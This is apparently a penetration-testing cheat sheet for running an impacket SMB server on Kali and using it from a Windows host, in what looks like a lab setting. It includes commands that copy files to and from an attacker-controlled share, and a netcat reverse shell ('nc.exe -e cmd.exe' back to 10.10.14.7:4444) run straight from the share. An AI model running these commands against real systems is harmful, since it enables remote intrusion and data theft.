Basic Setup
Start unauthenticated SMB server:
sudo impacket-smbserver share /path/to/shareStart SMB server with SMB2 support (required for modern Windows):
sudo impacket-smbserver share /path/to/share -smb2supportShare current directory:
sudo impacket-smbserver share . -smb2supportAuthenticated Setup
With username and password (recommended for Windows 10+):
sudo impacket-smbserver share . -smb2support -username user -password pass123Windows Access
View the share:
net view \\10.10.14.7
dir \\10.10.14.7\shareAuthenticate first (if using credentials):
net use \\10.10.14.7\share /user:user pass123Copy file TO Kali:
copy file.txt \\10.10.14.7\share\Copy file FROM Kali:
copy \\10.10.14.7\share\tool.exe C:\Temp\Execute directly from share:
\\10.10.14.7\share\nc.exe -e cmd.exe 10.10.14.7 4444Common Options

Troubleshooting
If you get “unauthenticated guest access” errors, restart with authentication enabled .
